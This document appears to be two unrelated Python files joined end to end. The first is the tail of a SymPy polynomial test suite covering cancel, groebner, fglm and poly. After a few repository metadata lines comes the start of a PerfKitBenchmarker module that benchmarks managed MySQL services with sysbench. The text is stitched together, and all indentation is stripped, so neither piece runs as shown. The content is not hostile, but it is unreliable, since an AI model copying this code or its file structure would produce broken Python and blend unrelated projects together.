# issue 8296
f = Poly(x**4 - 1)
assert f.nroots(2) == [w.n(2) for w in f.all_roots()]
def test_ground_roots():
f = x**6 - 4*x**4 + 4*x**3 - x**2
assert Poly(f).ground_roots() == {S(1): 2, S(0): 2}
assert ground_roots(f) == {S(1): 2, S(0): 2}
def test_nth_power_roots_poly():
f = x**4 - x**2 + 1
f_2 = (x**2 - x + 1)**2
f_3 = (x**2 + 1)**2
f_4 = (x**2 + x + 1)**2
f_12 = (x - 1)**4
assert nth_power_roots_poly(f, 1) == f
raises(ValueError, lambda: nth_power_roots_poly(f, 0))
raises(ValueError, lambda: nth_power_roots_poly(f, x))
assert factor(nth_power_roots_poly(f, 2)) == f_2
assert factor(nth_power_roots_poly(f, 3)) == f_3
assert factor(nth_power_roots_poly(f, 4)) == f_4
assert factor(nth_power_roots_poly(f, 12)) == f_12
raises(MultivariatePolynomialError, lambda: nth_power_roots_poly(
x + y, 2, x, y))
def test_torational_factor_list():
p = expand(((x**2-1)*(x-2)).subs({x:x*(1 + sqrt(2))}))
assert _torational_factor_list(p, x) == (-2, [
(-x*(1 + sqrt(2))/2 + 1, 1),
(-x*(1 + sqrt(2)) - 1, 1),
(-x*(1 + sqrt(2)) + 1, 1)])
p = expand(((x**2-1)*(x-2)).subs({x:x*(1 + 2**Rational(1, 4))}))
assert _torational_factor_list(p, x) is None
def test_cancel():
assert cancel(0) == 0
assert cancel(7) == 7
assert cancel(x) == x
assert cancel(oo) == oo
assert cancel((2, 3)) == (1, 2, 3)
assert cancel((1, 0), x) == (1, 1, 0)
assert cancel((0, 1), x) == (1, 0, 1)
f, g, p, q = 4*x**2 - 4, 2*x - 2, 2*x + 2, 1
F, G, P, Q = [ Poly(u, x) for u in (f, g, p, q) ]
assert F.cancel(G) == (1, P, Q)
assert cancel((f, g)) == (1, p, q)
assert cancel((f, g), x) == (1, p, q)
assert cancel((f, g), (x,)) == (1, p, q)
assert cancel((F, G)) == (1, P, Q)
assert cancel((f, g), polys=True) == (1, P, Q)
assert cancel((F, G), polys=False) == (1, p, q)
f = (x**2 - 2)/(x + sqrt(2))
assert cancel(f) == f
assert cancel(f, greedy=False) == x - sqrt(2)
f = (x**2 - 2)/(x - sqrt(2))
assert cancel(f) == f
assert cancel(f, greedy=False) == x + sqrt(2)
assert cancel((x**2/4 - 1, x/2 - 1)) == (S(1)/2, x + 2, 1)
assert cancel((x**2 - y)/(x - y)) == 1/(x - y)*(x**2 - y)
assert cancel((x**2 - y**2)/(x - y), x) == x + y
assert cancel((x**2 - y**2)/(x - y), y) == x + y
assert cancel((x**2 - y**2)/(x - y)) == x + y
assert cancel((x**3 - 1)/(x**2 - 1)) == (x**2 + x + 1)/(x + 1)
assert cancel((x**3/2 - S(1)/2)/(x**2 - 1)) == (x**2 + x + 1)/(2*x + 2)
assert cancel((exp(2*x) + 2*exp(x) + 1)/(exp(x) + 1)) == exp(x) + 1
f = Poly(x**2 - a**2, x)
g = Poly(x - a, x)
F = Poly(x + a, x)
G = Poly(1, x)
assert cancel((f, g)) == (1, F, G)
f = x**3 + (sqrt(2) - 2)*x**2 - (2*sqrt(2) + 3)*x - 3*sqrt(2)
g = x**2 - 2
assert cancel((f, g), extension=True) == (1, x**2 - 2*x - 3, x - sqrt(2))
f = Poly(-2*x + 3, x)
g = Poly(-x**9 + x**8 + x**6 - x**5 + 2*x**2 - 3*x + 1, x)
assert cancel((f, g)) == (1, -f, -g)
f = Poly(y, y, domain='ZZ(x)')
g = Poly(1, y, domain='ZZ[x]')
assert f.cancel(
g) == (1, Poly(y, y, domain='ZZ(x)'), Poly(1, y, domain='ZZ(x)'))
assert f.cancel(g, include=True) == (
Poly(y, y, domain='ZZ(x)'), Poly(1, y, domain='ZZ(x)'))
f = Poly(5*x*y + x, y, domain='ZZ(x)')
g = Poly(2*x**2*y, y, domain='ZZ(x)')
assert f.cancel(g, include=True) == (
Poly(5*y + 1, y, domain='ZZ(x)'), Poly(2*x*y, y, domain='ZZ(x)'))
f = -(-2*x - 4*y + 0.005*(z - y)**2)/((z - y)*(-z + y + 2))
assert cancel(f).is_Mul == True
P = tanh(x - 3.0)
Q = tanh(x + 3.0)
f = ((-2*P**2 + 2)*(-P**2 + 1)*Q**2/2 + (-2*P**2 + 2)*(-2*Q**2 + 2)*P*Q - (-2*P**2 + 2)*P**2*Q**2 + (-2*Q**2 + 2)*(-Q**2 + 1)*P**2/2 - (-2*Q**2 + 2)*P**2*Q**2)/(2*sqrt(P**2*Q**2 + 0.0001)) \
+ (-(-2*P**2 + 2)*P*Q**2/2 - (-2*Q**2 + 2)*P**2*Q/2)*((-2*P**2 + 2)*P*Q**2/2 + (-2*Q**2 + 2)*P**2*Q/2)/(2*(P**2*Q**2 + 0.0001)**(S(3)/2))
assert cancel(f).is_Mul == True
# issue 7022
A = Symbol('A', commutative=False)
p1 = Piecewise((A*(x**2 - 1)/(x + 1), x > 1), ((x + 2)/(x**2 + 2*x), True))
p2 = Piecewise((A*(x - 1), x > 1), (1/x, True))
assert cancel(p1) == p2
assert cancel(2*p1) == 2*p2
assert cancel(1 + p1) == 1 + p2
assert cancel((x**2 - 1)/(x + 1)*p1) == (x - 1)*p2
assert cancel((x**2 - 1)/(x + 1) + p1) == (x - 1) + p2
p3 = Piecewise(((x**2 - 1)/(x + 1), x > 1), ((x + 2)/(x**2 + 2*x), True))
p4 = Piecewise(((x - 1), x > 1), (1/x, True))
assert cancel(p3) == p4
assert cancel(2*p3) == 2*p4
assert cancel(1 + p3) == 1 + p4
assert cancel((x**2 - 1)/(x + 1)*p3) == (x - 1)*p4
assert cancel((x**2 - 1)/(x + 1) + p3) == (x - 1) + p4
# issue 9363
M = MatrixSymbol('M', 5, 5)
assert cancel(M[0,0] + 7) == M[0,0] + 7
expr = sin(M[1, 4] + M[2, 1] * 5 * M[4, 0]) - 5 * M[1, 2] / z
assert cancel(expr) == expr
def test_reduced():
f = 2*x**4 + y**2 - x**2 + y**3
G = [x**3 - x, y**3 - y]
Q = [2*x, 1]
r = x**2 + y**2 + y
assert reduced(f, G) == (Q, r)
assert reduced(f, G, x, y) == (Q, r)
H = groebner(G)
assert H.reduce(f) == (Q, r)
Q = [Poly(2*x, x, y), Poly(1, x, y)]
r = Poly(x**2 + y**2 + y, x, y)
assert _strict_eq(reduced(f, G, polys=True), (Q, r))
assert _strict_eq(reduced(f, G, x, y, polys=True), (Q, r))
H = groebner(G, polys=True)
assert _strict_eq(H.reduce(f), (Q, r))
f = 2*x**3 + y**3 + 3*y
G = groebner([x**2 + y**2 - 1, x*y - 2])
Q = [x**2 - x*y**3/2 + x*y/2 + y**6/4 - y**4/2 + y**2/4, -y**5/4 + y**3/2 + 3*y/4]
r = 0
assert reduced(f, G) == (Q, r)
assert G.reduce(f) == (Q, r)
assert reduced(f, G, auto=False)[1] != 0
assert G.reduce(f, auto=False)[1] != 0
assert G.contains(f) is True
assert G.contains(f + 1) is False
assert reduced(1, [1], x) == ([1], 0)
raises(ComputationFailed, lambda: reduced(1, [1]))
def test_groebner():
assert groebner([], x, y, z) == []
assert groebner([x**2 + 1, y**4*x + x**3], x, y, order='lex') == [1 + x**2, -1 + y**4]
assert groebner([x**2 + 1, y**4*x + x**3, x*y*z**3], x, y, z, order='grevlex') == [-1 + y**4, z**3, 1 + x**2]
assert groebner([x**2 + 1, y**4*x + x**3], x, y, order='lex', polys=True) == \
[Poly(1 + x**2, x, y), Poly(-1 + y**4, x, y)]
assert groebner([x**2 + 1, y**4*x + x**3, x*y*z**3], x, y, z, order='grevlex', polys=True) == \
[Poly(-1 + y**4, x, y, z), Poly(z**3, x, y, z), Poly(1 + x**2, x, y, z)]
assert groebner([x**3 - 1, x**2 - 1]) == [x - 1]
assert groebner([Eq(x**3, 1), Eq(x**2, 1)]) == [x - 1]
F = [3*x**2 + y*z - 5*x - 1, 2*x + 3*x*y + y**2, x - 3*y + x*z - 2*z**2]
f = z**9 - x**2*y**3 - 3*x*y**2*z + 11*y*z**2 + x**2*z**2 - 5
G = groebner(F, x, y, z, modulus=7, symmetric=False)
assert G == [1 + x + y + 3*z + 2*z**2 + 2*z**3 + 6*z**4 + z**5,
1 + 3*y + y**2 + 6*z**2 + 3*z**3 + 3*z**4 + 3*z**5 + 4*z**6,
1 + 4*y + 4*z + y*z + 4*z**3 + z**4 + z**6,
6 + 6*z + z**2 + 4*z**3 + 3*z**4 + 6*z**5 + 3*z**6 + z**7]
Q, r = reduced(f, G, x, y, z, modulus=7, symmetric=False, polys=True)
assert sum([ q*g for q, g in zip(Q, G.polys)], r) == Poly(f, modulus=7)
F = [x*y - 2*y, 2*y**2 - x**2]
assert groebner(F, x, y, order='grevlex') == \
[y**3 - 2*y, x**2 - 2*y**2, x*y - 2*y]
assert groebner(F, y, x, order='grevlex') == \
[x**3 - 2*x**2, -x**2 + 2*y**2, x*y - 2*y]
assert groebner(F, order='grevlex', field=True) == \
[y**3 - 2*y, x**2 - 2*y**2, x*y - 2*y]
assert groebner([1], x) == [1]
assert groebner([x**2 + 2.0*y], x, y) == [1.0*x**2 + 2.0*y]
raises(ComputationFailed, lambda: groebner([1]))
assert groebner([x**2 - 1, x**3 + 1], method='buchberger') == [x + 1]
assert groebner([x**2 - 1, x**3 + 1], method='f5b') == [x + 1]
raises(ValueError, lambda: groebner([x, y], method='unknown'))
def test_fglm():
F = [a + b + c + d, a*b + a*d + b*c + b*d, a*b*c + a*b*d + a*c*d + b*c*d, a*b*c*d - 1]
G = groebner(F, a, b, c, d, order=grlex)
B = [
4*a + 3*d**9 - 4*d**5 - 3*d,
4*b + 4*c - 3*d**9 + 4*d**5 + 7*d,
4*c**2 + 3*d**10 - 4*d**6 - 3*d**2,
4*c*d**4 + 4*c - d**9 + 4*d**5 + 5*d,
d**12 - d**8 - d**4 + 1,
]
assert groebner(F, a, b, c, d, order=lex) == B
assert G.fglm(lex) == B
F = [9*x**8 + 36*x**7 - 32*x**6 - 252*x**5 - 78*x**4 + 468*x**3 + 288*x**2 - 108*x + 9,
-72*t*x**7 - 252*t*x**6 + 192*t*x**5 + 1260*t*x**4 + 312*t*x**3 - 404*t*x**2 - 576*t*x + \
108*t - 72*x**7 - 256*x**6 + 192*x**5 + 1280*x**4 + 312*x**3 - 576*x + 96]
G = groebner(F, t, x, order=grlex)
B = [
203577793572507451707*t + 627982239411707112*x**7 - 666924143779443762*x**6 - \
10874593056632447619*x**5 + 5119998792707079562*x**4 + 72917161949456066376*x**3 + \
20362663855832380362*x**2 - 142079311455258371571*x + 183756699868981873194,
9*x**8 + 36*x**7 - 32*x**6 - 252*x**5 - 78*x**4 + 468*x**3 + 288*x**2 - 108*x + 9,
]
assert groebner(F, t, x, order=lex) == B
assert G.fglm(lex) == B
F = [x**2 - x - 3*y + 1, -2*x + y**2 + y - 1]
G = groebner(F, x, y, order=lex)
B = [
x**2 - x - 3*y + 1,
y**2 - 2*x + y - 1,
]
assert groebner(F, x, y, order=grlex) == B
assert G.fglm(grlex) == B
def test_is_zero_dimensional():
assert is_zero_dimensional([x, y], x, y) is True
assert is_zero_dimensional([x**3 + y**2], x, y) is False
assert is_zero_dimensional([x, y, z], x, y, z) is True
assert is_zero_dimensional([x, y, z], x, y, z, t) is False
F = [x*y - z, y*z - x, x*y - y]
assert is_zero_dimensional(F, x, y, z) is True
F = [x**2 - 2*x*z + 5, x*y**2 + y*z**3, 3*y**2 - 8*z**2]
assert is_zero_dimensional(F, x, y, z) is True
def test_GroebnerBasis():
F = [x*y - 2*y, 2*y**2 - x**2]
G = groebner(F, x, y, order='grevlex')
H = [y**3 - 2*y, x**2 - 2*y**2, x*y - 2*y]
P = [ Poly(h, x, y) for h in H ]
assert isinstance(G, GroebnerBasis) is True
assert len(G) == 3
assert G[0] == H[0] and not G[0].is_Poly
assert G[1] == H[1] and not G[1].is_Poly
assert G[2] == H[2] and not G[2].is_Poly
assert G[1:] == H[1:] and not any(g.is_Poly for g in G[1:])
assert G[:2] == H[:2] and not any(g.is_Poly for g in G[1:])
assert G.exprs == H
assert G.polys == P
assert G.gens == (x, y)
assert G.domain == ZZ
assert G.order == grevlex
assert G == H
assert G == tuple(H)
assert G == P
assert G == tuple(P)
assert G != []
G = groebner(F, x, y, order='grevlex', polys=True)
assert G[0] == P[0] and G[0].is_Poly
assert G[1] == P[1] and G[1].is_Poly
assert G[2] == P[2] and G[2].is_Poly
assert G[1:] == P[1:] and all(g.is_Poly for g in G[1:])
assert G[:2] == P[:2] and all(g.is_Poly for g in G[1:])
def test_poly():
assert poly(x) == Poly(x, x)
assert poly(y) == Poly(y, y)
assert poly(x + y) == Poly(x + y, x, y)
assert poly(x + sin(x)) == Poly(x + sin(x), x, sin(x))
assert poly(x + y, wrt=y) == Poly(x + y, y, x)
assert poly(x + sin(x), wrt=sin(x)) == Poly(x + sin(x), sin(x), x)
assert poly(x*y + 2*x*z**2 + 17) == Poly(x*y + 2*x*z**2 + 17, x, y, z)
assert poly(2*(y + z)**2 - 1) == Poly(2*y**2 + 4*y*z + 2*z**2 - 1, y, z)
assert poly(
x*(y + z)**2 - 1) == Poly(x*y**2 + 2*x*y*z + x*z**2 - 1, x, y, z)
assert poly(2*x*(
y + z)**2 - 1) == Poly(2*x*y**2 + 4*x*y*z + 2*x*z**2 - 1, x, y, z)
assert poly(2*(
y + z)**2 - x - 1) == Poly(2*y**2 + 4*y*z + 2*z**2 - x - 1, x, y, z)
assert poly(x*(
y + z)**2 - x - 1) == Poly(x*y**2 + 2*x*y*z + x*z**2 - x - 1, x, y, z)
assert poly(2*x*(y + z)**2 - x - 1) == Poly(2*x*y**2 + 4*x*y*z + 2*
x*z**2 - x - 1, x, y, z)
assert poly(x*y + (x + y)**2 + (x + z)**2) == \
Poly(2*x*z + 3*x*y + y**2 + z**2 + 2*x**2, x, y, z)
assert poly(x*y*(x + y)*(x + z)**2) == \
Poly(x**3*y**2 + x*y**2*z**2 + y*x**2*z**2 + 2*z*x**2*
y**2 + 2*y*z*x**3 + y*x**4, x, y, z)
assert poly(Poly(x + y + z, y, x, z)) == Poly(x + y + z, y, x, z)
assert poly((x + y)**2, x) == Poly(x**2 + 2*x*y + y**2, x, domain=ZZ[y])
assert poly((x + y)**2, y) == Poly(x**2 + 2*x*y + y**2, y, domain=ZZ[x])
assert poly(1, x) == Poly(1, x)
raises(GeneratorsNeeded, lambda: poly(1))
# issue 6184
assert poly(x + y, x, y) == Poly(x + y, x, y)
assert poly(x + y, y, x) == Poly(x + y, y, x)
def test_keep_coeff():
u = Mul(2, x + 1, evaluate=False)
assert _keep_coeff(S(1), x) == x
assert _keep_coeff(S(-1), x) == -x
assert _keep_coeff(S(1.0), x) == 1.0*x
assert _keep_coeff(S(-1.0), x) == -1.0*x
assert _keep_coeff(S(1), 2*x) == 2*x
assert _keep_coeff(S(2), x/2) == x
assert _keep_coeff(S(2), sin(x)) == 2*sin(x)
assert _keep_coeff(S(2), x + 1) == u
assert _keep_coeff(x, 1/x) == 1
assert _keep_coeff(x + 1, S(2)) == u
@XFAIL
def test_poly_matching_consistency():
# Test for this issue:
# https://github.com/sympy/sympy/issues/5514
assert I * Poly(x, x) == Poly(I*x, x)
assert Poly(x, x) * I == Poly(I*x, x)
@XFAIL
def test_issue_5786():
assert expand(factor(expand(
(x - I*y)*(z - I*t)), extension=[I])) == -I*t*x - t*y + x*z - I*y*z
def test_noncommutative():
class foo(Expr):
is_commutative=False
e = x/(x + x*y)
c = 1/( 1 + y)
assert cancel(foo(e)) == foo(c)
assert cancel(e + foo(e)) == c + foo(c)
assert cancel(e*foo(c)) == c*foo(c)
def test_to_rational_coeffs():
assert to_rational_coeffs(
Poly(x**3 + y*x**2 + sqrt(y), x, domain='EX')) == None
|
abloomston/sympy
|
sympy/polys/tests/test_polytools.py
|
Python
|
bsd-3-clause
| 106,107
| 0.001301
|
# Copyright 2014 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""MySQL Service Benchmarks.
This is a set of benchmarks that measures performance of MySQL Databases on
managed MySQL services.
- On AWS, we will use RDS+MySQL.
- On GCP, we will use Cloud SQL v2 (Performance Edition). As of July 2015, you
will need to request to whitelist your GCP project to get access to Cloud SQL
v2. Follow instructions on your GCP's project console to do that.
As other cloud providers deliver a managed MySQL service, we will add it here.
"""
import json
import logging
import re
import StringIO
import time
import uuid
from perfkitbenchmarker import benchmark_spec as benchmark_spec_class
from perfkitbenchmarker import configs
from perfkitbenchmarker import flags
from perfkitbenchmarker import sample
from perfkitbenchmarker import vm_util
from perfkitbenchmarker.providers.aws import aws_network
from perfkitbenchmarker.providers.aws import util
FLAGS = flags.FLAGS
flags.DEFINE_enum(
'mysql_svc_db_instance_cores', '4', ['1', '4', '8', '16'],
'The number of cores to be provisioned for the DB instance.')
flags.DEFINE_integer('mysql_svc_oltp_tables_count', 4,
'The number of tables used in sysbench oltp.lua tests')
flags.DEFINE_integer('mysql_svc_oltp_table_size', 100000,
'The number of rows of each table used in the oltp tests')
flags.DEFINE_integer('sysbench_warmup_seconds', 120,
'The duration of the warmup run in which results are '
'discarded, in seconds.')
flags.DEFINE_integer('sysbench_run_seconds', 480,
'The duration of the actual run in which results are '
'collected, in seconds.')
flags.DEFINE_integer('sysbench_thread_count', 16,
'The number of test threads on the client side.')
flags.DEFINE_integer('sysbench_latency_percentile', 99,
'The latency percentile we ask sysbench to compute.')
flags.DEFINE_integer('sysbench_report_interval', 2,
'The interval, in seconds, we ask sysbench to report '
'results.')
BENCHMARK_NAME = 'mysql_service'
BENCHMARK_CONFIG = """
mysql_service:
description: MySQL service benchmarks.
vm_groups:
default:
vm_spec: *default_single_core
"""
# Query DB creation status once every 15 seconds
DB_STATUS_QUERY_INTERVAL = 15
# How many times we will wait for the service to create the DB
# total wait time is therefore: "query interval * query limit"
DB_STATUS_QUERY_LIMIT = 200
# Map from FLAGs.mysql_svc_db_instance_cores to RDS DB Type
RDS_CORE_TO_DB_CLASS_MAP = {
'1': 'db.m3.medium',
'4': 'db.m3.xlarge',
'8': 'db.m3.2xlarge',
'16': 'db.r3.4xlarge', # m3 series doesn't have 16 core.
}
RDS_DB_ENGINE = 'MySQL'
RDS_DB_ENGINE_VERSION = '5.6.23'
RDS_DB_STORAGE_TYPE_GP2 = 'gp2'
# Storage IOPS capacity of the DB instance.
# Currently this is fixed because the cloud provider GCP does not support
# changing this setting. As soon as it supports changing the storage size, we
# will expose a flag here to allow caller to select a storage size.
# Default GCP storage size is 1TB PD-SSD which supports 10K Read or 15K Write
# IOPS (12.5K mixed).
# To support 12.5K IOPS on EBS-GP, we need 4170 GB disk.
RDS_DB_STORAGE_GP2_SIZE = '4170'
# A list of status strings that are possible during RDS DB creation.
RDS_DB_CREATION_PENDING_STATUS = frozenset(
['creating', 'modifying', 'backing-up', 'rebooting'])
# Constants defined for Sysbench tests.
RAND_INIT_ON = 'on'
DISABLE = 'disable'
UNIFORM = 'uniform'
OFF = 'off'
MYSQL_ROOT_USER = 'root'
MYSQL_ROOT_PASSWORD_PREFIX = 'Perfkit8'
MYSQL_PORT = '3306'
NORMAL_SYSBENCH_PATH_PREFIX = '/usr'
PREPARE_SCRIPT_PATH = '/share/doc/sysbench/tests/db/parallel_prepare.lua'
OLTP_SCRIPT_PATH = '/share/doc/sysbench/tests/db/oltp.lua'
SYSBENCH_RESULT_NAME_DATA_LOAD = 'sysbench data load time'
SYSBENCH_RESULT_NAME_TPS = 'sysbench tps'
SYSBENCH_RESULT_NAME_LATENCY = 'sysbench latency'
NA_UNIT = 'NA'
SECONDS_UNIT = 'seconds'
MS_UNIT = 'milliseconds'
# These are the constants that should be specified in GCP's cloud SQL command.
DEFAULT_BACKUP_START_TIME = '07:00'
GCP_MY_SQL_VERSION = 'MYSQL_5_6'
GCP_PRICING_PLAN = 'PACKAGE'
RESPONSE_TIME_TOKENS = ['min', 'avg', 'max', 'percentile']
def GetConfig(user_config):
return configs.LoadConfig(BENCHMARK_CONFIG, user_config, BENCHMARK_NAME)
class DBStatusQueryError(Exception):
pass
def _GenerateRandomPassword():
""" Generates a random password to be used by the DB instance.
Args:
None
Returns:
A string that can be used as password to a DB instance.
"""
return '%s%s' % (MYSQL_ROOT_PASSWORD_PREFIX, str(uuid.uuid4())[-8:])
def ParseSysbenchOutput(sysbench_output, results, metadata):
"""Parses sysbench output.
Extract relevant TPS and latency numbers, and populate the final result
collection with these information.
Specifically, we are interested in tps numbers reported by each reporting
interval, and the summary latency numbers printed at the end of the run in
"General Statistics" -> "Response Time".
Example Sysbench output:
sysbench 0.5: multi-threaded system evaluation benchmark
<... lots of output we don't care here ...>
Threads started!
[ 2s] threads: 16, tps: 526.38, reads: 7446.79, writes: 2105.52, response
time: 210.67ms (99%), errors: 0.00, reconnects: 0.00
< .... lots of tps output every 2 second, we need all those>
< ... lots of other output we don't care for now...>
General statistics:
total time: 17.0563s
total number of events: 10000
total time taken by event execution: 272.6053s
response time:
min: 18.31ms
avg: 27.26ms
max: 313.50ms
approx. 99 percentile: 57.15ms
< We care about the response time section above, these are latency numbers>
< then there are some outputs after this, we don't care either>
Args:
sysbench_output: The output from sysbench.
results: The dictionary to store results based on sysbench output.
metadata: The metadata to be passed along to the Samples class.
"""
all_tps = []
seen_general_statistics = False
seen_response_time = False
response_times = {}
sysbench_output_io = StringIO.StringIO(sysbench_output)
for line in sysbench_output_io.readlines():
if re.match('^\[', line):
tps = re.findall('tps: (.*?),', line)
all_tps.append(float(tps[0]))
continue
if line.startswith('General statistics:'):
seen_general_statistics = True
continue
if seen_general_statistics:
if re.match('^ +response time:.*', line):
seen_response_time = True
continue
if seen_general_statistics and seen_response_time:
for token in RESPONSE_TIME_TOKENS:
search_string = '.*%s: +(.*)ms' % token
if re.findall(search_string, line):
response_times[token] = float(re.findall(search_string, line)[0])
tps_line = ', '.join(map(str, all_tps))
# Print all tps data points in the log for reference. And report
# percentiles of these tps data in the final result set.
logging.info('All TPS numbers: \n %s', tps_line)
tps_percentile = sample.PercentileCalculator(all_tps)
for percentile in sample.PERCENTILES_LIST:
percentile_string = 'p%s' % str(percentile)
logging.info('%s tps %f', percentile_string,
tps_percentile[percentile_string])
metric_name = ('%s %s') % (SYSBENCH_RESULT_NAME_TPS, percentile_string)
results.append(sample.Sample(
metric_name,
tps_percentile[percentile_string],
NA_UNIT,
metadata))
# Also report average, stddev, and coefficient of variation
for token in ['average', 'stddev']:
logging.info('tps %s %f', token, tps_percentile[token])
metric_name = ('%s %s') % (SYSBENCH_RESULT_NAME_TPS, token)
results.append(sample.Sample(
metric_name,
tps_percentile[token],
NA_UNIT,
metadata))
if tps_percentile['average'] > 0:
cv = tps_percentile['stddev'] / tps_percentile['average']
logging.info('tps coefficient of variation %f', cv)
metric_name = ('%s %s') % (SYSBENCH_RESULT_NAME_TPS, 'cv')
results.append(sample.Sample(
metric_name,
cv,
NA_UNIT,
metadata))
# Now, report the latency numbers.
for token in RESPONSE_TIME_TOKENS:
logging.info('%s_response_time is %f', token, response_times[token])
metric_name = '%s %s' % (SYSBENCH_RESULT_NAME_LATENCY, token)
if token == 'percentile':
metric_name = '%s %s' % (metric_name, FLAGS.sysbench_latency_percentile)
results.append(sample.Sample(
metric_name,
response_times[token],
MS_UNIT,
metadata))
def _GetSysbenchCommandPrefix():
""" Decides what the prefix is for sysbench command based on os type.
Args:
None.
Returns:
A string representing the sysbench command prefix.
"""
if FLAGS.os_type == 'rhel':
return vm_util.VM_TMP_DIR
else:
return NORMAL_SYSBENCH_PATH_PREFIX
def _IssueSysbenchCommand(vm, duration):
""" Issues a sysbench run command given a vm and a duration.
Does nothing if duration is <= 0
Args:
vm: The test VM to issue command to.
duration: the duration of the sysbench run.
Returns:
stdout, stderr: the result of the command.
"""
stdout = ''
stderr = ''
oltp_script_path = '%s%s' % (_GetSysbenchCommandPrefix(), OLTP_SCRIPT_PATH)
if duration > 0:
run_cmd_tokens = ['sysbench',
'--test=%s' % oltp_script_path,
'--mysql_svc_oltp_tables_count=%d' %
FLAGS.mysql_svc_oltp_tables_count,
'--oltp-table-size=%d' %
FLAGS.mysql_svc_oltp_table_size,
'--rand-init=%s' % RAND_INIT_ON,
'--db-ps-mode=%s' % DISABLE,
'--oltp-dist-type=%s' % UNIFORM,
'--oltp-read-only=%s' % OFF,
'--num-threads=%d' % FLAGS.sysbench_thread_count,
'--percentile=%d' % FLAGS.sysbench_latency_percentile,
'--report-interval=%d' %
FLAGS.sysbench_report_interval,
'--max-requests=0',
'--max-time=%d' % duration,
'--mysql-user=%s' % vm.db_instance_master_user,
'--mysql-password="%s"' %
vm.db_instance_master_password,
'--mysql-host=%s' % vm.db_instance_address,
'run']
run_cmd = ' '.join(run_cmd_tokens)
stdout, stderr = vm.RobustRemoteCommand(run_cmd)
logging.info('Sysbench results: \n stdout is:\n%s\nstderr is\n%s',
stdout, stderr)
return stdout, stderr
def _RunSysbench(vm, metadata):
""" Runs the Sysbench OLTP test.
The test is run on the DB instance as indicated by the vm.db_instance_address.
Args:
vm: The client VM that will issue the sysbench test.
metadata: The PKB metadata to be passed along to the final results.
Returns:
Results: A list of results of this run.
"""
results = []
if not hasattr(vm, 'db_instance_address'):
logging.error(
'Prepare has likely failed, db_instance_address is not found.')
raise DBStatusQueryError('RunSysbench: DB instance address not found.')
# Create the sbtest database for Sysbench.
# str(uuid.uuid4())[-8:]
create_sbtest_db_cmd = ('mysql -h %s -u %s -p%s '
'-e \'create database sbtest;\'') % (
vm.db_instance_address,
vm.db_instance_master_user,
vm.db_instance_master_password)
stdout, stderr = vm.RemoteCommand(create_sbtest_db_cmd)
logging.info('sbtest db created, stdout is %s, stderr is %s',
stdout, stderr)
# Provision the Sysbench test based on the input flags (load data into DB)
# Could take a long time if the data to be loaded is large.
data_load_start_time = time.time()
prepare_script_path = '%s%s' % (_GetSysbenchCommandPrefix(),
PREPARE_SCRIPT_PATH)
data_load_cmd_tokens = ['sysbench',
'--test=%s' % prepare_script_path,
'--mysql_svc_oltp_tables_count=%d' %
FLAGS.mysql_svc_oltp_tables_count,
'--oltp-table-size=%d' %
FLAGS.mysql_svc_oltp_table_size,
'--rand-init=%s' % RAND_INIT_ON,
'--num-threads=%d' %
FLAGS.mysql_svc_oltp_tables_count,
'--mysql-user=%s' % vm.db_instance_master_user,
'--mysql-password="%s"' %
vm.db_instance_master_password,
'--mysql-host=%s' % vm.db_instance_address,
'run']
data_load_cmd = ' '.join(data_load_cmd_tokens)
# Sysbench output is in stdout, but we also get stderr just in case
# something went wrong.
stdout, stderr = vm.RobustRemoteCommand(data_load_cmd)
load_duration = time.time() - data_load_start_time
logging.info('It took %d seconds to finish the data loading step',
load_duration)
logging.info('data loading results: \n stdout is:\n%s\nstderr is\n%s',
stdout, stderr)
results.append(sample.Sample(
SYSBENCH_RESULT_NAME_DATA_LOAD,
load_duration,
SECONDS_UNIT,
metadata))
# Now run the sysbench OLTP test and parse the results.
for phase in ['warm-up', 'run']:
# First step is to run the test long enough to cover the warmup period
# as requested by the caller. Then we do the "real" run, parse and report
# the results.
duration = 0
if phase == 'warm-up' and FLAGS.sysbench_warmup_seconds > 0:
duration = FLAGS.sysbench_warmup_seconds
logging.info('Sysbench warm-up run, duration is %d', duration)
elif phase == 'run':
duration = FLAGS.sysbench_run_seconds
logging.info('Sysbench real run, duration is %d', duration)
stdout, stderr = _IssueSysbenchCommand(vm, duration)
if phase == 'run':
# We only need to parse the results for the "real" run.
logging.info('\n Parsing Sysbench Results...\n')
ParseSysbenchOutput(stdout, results, metadata)
return results
def _RDSParseDBInstanceStatus(json_response):
"""Parses a JSON response from an RDS DB status query command.
Args:
json_response: The response from the DB status query command in JSON.
Returns:
A list of sample.Sample objects.
"""
status = ''
# Sometimes you look for 'DBInstance', some times you need to look for
# 'DBInstances' and then take the first element
if 'DBInstance' in json_response:
status = json_response['DBInstance']['DBInstanceStatus']
else:
if 'DBInstances' in json_response:
status = json_response['DBInstances'][0]['DBInstanceStatus']
return status
class RDSMySQLBenchmark(object):
"""MySQL benchmark based on the RDS service on AWS."""
def Prepare(self, vm):
"""Prepares the DB and everything for the AWS-RDS provider.
Args:
vm: The VM to be used as the test client.
"""
logging.info('Preparing MySQL Service benchmarks for RDS.')
# TODO: Refactor the RDS DB instance creation and deletion logic out
# to a new class called RDSDBInstance that Inherits from
# perfkitbenchmarker.resource.BaseResource.
# And do the same for GCP.
# First is to create another subnet in the same VPC as the VM but in a
# different zone. RDS requires two subnets in two different zones to create
# a DB instance, EVEN IF you do not specify multi-AZ in your DB creation
# request.
# Get a list of zones and pick one that's different from the zone VM is in.
new_subnet_zone = None
get_zones_cmd = util.AWS_PREFIX + ['ec2', 'describe-availability-zones']
stdout, _, _ = vm_util.IssueCommand(get_zones_cmd)
response = json.loads(stdout)
all_zones = response['AvailabilityZones']
for zone in all_zones:
if zone['ZoneName'] != vm.zone:
new_subnet_zone = zone['ZoneName']
break
if new_subnet_zone is None:
raise DBStatusQueryError('Cannot find a zone to create the required '
'second subnet for the DB instance.')
# Now create a new subnet in the zone that's different from where the VM is
logging.info('Creating a second subnet in zone %s', new_subnet_zone)
new_subnet = aws_network.AwsSubnet(new_subnet_zone, vm.network.vpc.id,
'10.0.1.0/24')
new_subnet.Create()
logging.info('Successfully created a new subnet, subnet id is: %s',
new_subnet.id)
# Remember this so we can cleanup properly.
vm.extra_subnet_for_db = new_subnet
